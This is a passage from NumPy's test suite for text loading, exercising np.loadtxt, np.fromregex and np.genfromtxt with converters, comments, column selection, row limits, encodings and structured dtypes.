assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_converters_decode(self):
# test converters that decode strings
c = TextIO()
c.write(b'\xcf\x96')
c.seek(0)
x = self.loadfunc(c, dtype=np.unicode_,
converters={0: lambda x: x.decode('UTF-8')})
a = np.array([b'\xcf\x96'.decode('UTF-8')])
assert_array_equal(x, a)
def test_converters_nodecode(self):
# test native string converters enabled by setting an encoding
utf8 = b'\xcf\x96'.decode('UTF-8')
with temppath() as path:
with io.open(path, 'wt', encoding='UTF-8') as f:
f.write(utf8)
x = self.loadfunc(path, dtype=np.unicode_,
converters={0: lambda x: x + 't'},
encoding='UTF-8')
a = np.array([utf8 + 't'])
assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
loadfunc = staticmethod(np.loadtxt)
def setup(self):
# lower chunksize for testing
self.orig_chunk = np.lib.npyio._loadtxt_chunksize
np.lib.npyio._loadtxt_chunksize = 1
def teardown(self):
np.lib.npyio._loadtxt_chunksize = self.orig_chunk
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments_unicode(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=u'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_byte(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=b'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_multiple(self):
c = TextIO()
c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=['#', '@', '//'])
a = np.array([[1, 2, 3], [4, 5, 6]], int)
assert_array_equal(x, a)
def test_comments_multi_chars(self):
c = TextIO()
c.write('/* comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='/*')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
# Check that '/*' is not transformed to ['/', '*']
c = TextIO()
c.write('*/ comment\n1,2,3,5\n')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
comments='/*')
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Testing with an integer instead of a sequence
for int_type in [int, np.int8, np.int16,
np.int32, np.int64, np.uint8, np.uint16,
np.uint32, np.uint64]:
to_read = int_type(1)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=to_read)
assert_array_equal(x, a[:, 1])
# Testing with some crazy custom integer type
class CrazyInt:
def __index__(self):
return 1
crazy_int = CrazyInt()
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=crazy_int)
assert_array_equal(x, a[:, 1])
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
assert_array_equal(x, a[:, 1])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
# Testing non-ints in usecols
c.seek(0)
bogus_idx = 1.5
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=bogus_idx
)
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=[0, bogus_idx, 0]
)
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_str_dtype(self):
# see gh-8033
c = ["str1", "str2"]
for dt in (str, np.bytes_):
a = np.array(["str1", "str2"], dtype=dt)
x = np.loadtxt(c, dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_from_float_hex(self):
# IEEE doubles and floats only, otherwise the float32
# conversion may fail.
tgt = np.logspace(-10, 10, 5).astype(np.float32)
tgt = np.hstack((tgt, -tgt)).astype(float)
inp = '\n'.join(map(float.hex, tgt))
c = TextIO()
c.write(inp)
for dt in [float, np.float32]:
c.seek(0)
res = np.loadtxt(c, dtype=dt)
assert_equal(res, tgt, err_msg="%s" % dt)
def test_default_float_converter_no_default_hex_conversion(self):
"""
Ensure that fromhex is only used for values with the correct prefix and
is not called by default. Regression test related to gh-19598.
"""
c = TextIO("a b c")
with pytest.raises(
ValueError, match="could not convert string to float"
):
np.loadtxt(c)
def test_default_float_converter_exception(self):
"""
Ensure that the exception message raised during failed floating point
conversion is correct. Regression test related to gh-19598.
"""
c = TextIO("qrs tuv") # Invalid values for default float converter
with pytest.raises(
ValueError, match="could not convert string to float"
):
np.loadtxt(c)
def test_from_complex(self):
tgt = (complex(1, 1), complex(1, -1))
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, tgt)
def test_complex_misformatted(self):
# test for backward compatibility
# some complex formats used to generate x+-yj
a = np.zeros((2, 2), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.16e')
c.seek(0)
txt = c.read()
c.seek(0)
# misformat the sign on the imaginary part, gh 7895
txt_bad = txt.replace(b'e+00-', b'e00+-')
assert_(txt_bad != txt)
c.write(txt_bad)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, a)
def test_universal_newline(self):
with temppath() as name:
with open(name, 'w') as f:
f.write('1 21\r3 42\r')
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_unpack_structured(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
def test_none_as_string(self):
# gh-5155, None should work as string when format demands it
c = TextIO()
c.write('100,foo,200\n300,None,400')
c.seek(0)
dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
np.loadtxt(c, delimiter=',', dtype=dt, comments=None) # Should succeed
@pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
reason="Wrong preferred encoding")
def test_binary_load(self):
butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
b"20,2,3,\xc3\x95scar\n\r"
sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
with temppath() as path:
with open(path, "wb") as f:
f.write(butf8)
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode_)
assert_array_equal(x, sutf8)
# test broken latin1 conversion people now rely on
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype="S")
x = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello', b'20,2,3,\xc3\x95scar']
assert_array_equal(x, np.array(x, dtype="S"))
def test_max_rows(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_max_rows_with_skiprows(self):
c = TextIO()
c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
def test_max_rows_with_read_continuation(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
# test continuation
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([2,1,4,5], int)
assert_array_equal(x, a)
def test_max_rows_larger(self):
#test max_rows > num rows
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=6)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
assert_array_equal(x, a)
class Testfromregex:
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
@pytest.mark.parametrize("path_type", [str, Path])
def test_record_unicode(self, path_type):
utf8 = b'\xcf\x96'
with temppath() as str_path:
path = path_type(str_path)
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
def test_bad_dtype_not_structured(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
with pytest.raises(TypeError, match='structured datatype'):
np.fromregex(c, regexp, dtype=np.float64)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
# Test w/ explicit dtype
data = TextIO('1 2\n3 4')
test = np.genfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.genfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
# Test outputting a standard ndarray
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
# Test squeezing to 1D
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.genfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
# Test the stripping of comments
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
# Test row skipping
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.genfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
# Test retrieving a header
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None, names=True)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
# Test the automatic definition of the output dtype
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
# Tests whether the output dtype can be uniformized
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.genfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
# Test overwriting the names of the dtype
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.genfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
# Check that names can be retrieved even if the line is commented out.
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test, ctrl)
def test_names_and_comments_none(self):
# Tests case when names is true but comments is None (gh-10780)
data = TextIO('col1 col2\n 1 2\n 3 4')
test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
assert_equal(test, control)
def test_file_is_closed_on_error(self):
# gh-13200
with tempdir() as tmpdir:
fpath = os.path.join(tmpdir, "test.csv")
with open(fpath, "wb") as f:
f.write(u'\N{GREEK PI SYMBOL}'.encode('utf8'))
# ResourceWarnings are emitted from a destructor, so won't be
# detected by regular propagation to errors.
with assert_no_warnings():
with pytest.raises(UnicodeDecodeError):
np.genfromtxt(fpath, encoding="ascii")
def test_autonames_and_usecols(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
# Test the combination user-defined converters and usecol
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None,
converters={'C': lambda s: 2 * int(s)})
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
# Test the conversion to datetime.
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
# Test the conversion to datetime64.
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
# Test whether unused converters are forgotten
data = TextIO("1 21\n 3 42\n")
test = np.genfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.genfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
# Test some corner cases
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
names=None, converters=conv)
control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
assert_equal(test, control)
dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
